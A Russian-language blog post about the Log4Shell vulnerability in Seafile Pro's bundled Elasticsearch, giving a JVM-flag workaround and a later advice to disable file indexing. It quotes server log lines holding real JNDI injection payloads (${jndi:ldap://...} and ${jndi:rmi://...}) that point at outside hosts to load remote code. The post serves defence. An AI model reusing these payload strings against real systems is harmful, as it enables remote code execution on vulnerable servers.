Перейти к основному содержанию
 

Seafile PRO — workaround для log4j

Seafile

Профессиональная версия Seafile Pro Edition 7 и 8 уязвима для атак log4j (CVE-2021-44228) из-за использование Elastic Search 5.6. Для того,чтобы воспользоваться уязвимостью, злоумышленнику потребуется учётная запись с доступом к полнотекстовой поисковой строке или к API.

Пока не вышла новая версия, есть workaround. Редактируем seafile-server-latest/pro/elasticsearch/config/jvm.options:

-Dlog4j2.formatMsgNoLookups=true

Альтернативный вариант — отключить полнотекстовый поиск.

Примеры атак в логе seahub.log:

2021-12-11 11:35:27,421 [WARNING] django.request:152 get_response Not Found: /${jndi:ldap://85.10.195.175:80/ye}
2021-12-11 13:26:24,007 [WARNING] django.request:152 get_response Not Found: /${jndi:ldaps://852df20d.probe001.log4j.leakix.net:9200/b}
2021-12-11 13:43:10,039 [WARNING] django.request:152 get_response Not Found: /${jndi:ldap://185.244.214.217:57715/1}${jndi:ldap://185.244.214.217:57715/2}${jndi:ldap://185.244.214.217:57715/3}

В nginx:

138.68.167.19 - - [10/Dec/2021:19:33:44 +0100] "GET / HTTP/1.1" 400 248 "-" "${jndi:rmi://134.209.163.248:80/Z}" "-"
138.68.167.19 - - [10/Dec/2021:19:33:45 +0100] "GET /favicon.ico HTTP/1.1" 400 248 "-" "${jndi:rmi://134.209.163.248:80/Z}" "-"
147.182.154.100 - - [10/Dec/2021:21:03:28 +0100] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}" "-"

Ссылки

URGENT! Zero-Day-Exploit in log4j

SECURITY ADVISORY: Seafile Server’s vulnerability to “Log4Shell” (log4j vulnerability, CVE-2021-44228)

Update 15.12.2021

Из-за новой уязвимости CVE-2021-45046 обходной путь уже не помогает. Workaround другой — отключить использование Elastic Search:

[INDEX FILES]
enabled = false

Log4j — вторая уязвимость CVE-2021-45046

P.S.

Общедоступная версия Seafile Community Edition не подвержена уязвимости, в ней не используется Elastic Search.

Теги

 

Похожие материалы

Ошибка при установке Secret Net 7 - не удаётся записать значение в раздел

При установке Secret Net 7 иногда может возникнуть ошибка вида "Не удаётся записать значение в раздел". Дальше идёт указание ветки реестра и значения, которое не удаётся записать. Ошибка наблюдалась на Windows 7 x64 (и x86), а также на Windows Server 2012 R2. Инсталлятор Secret Net 7 запускался от имени администратора. Изменение прав доступа к веткам реестра не помогло решению проблемы.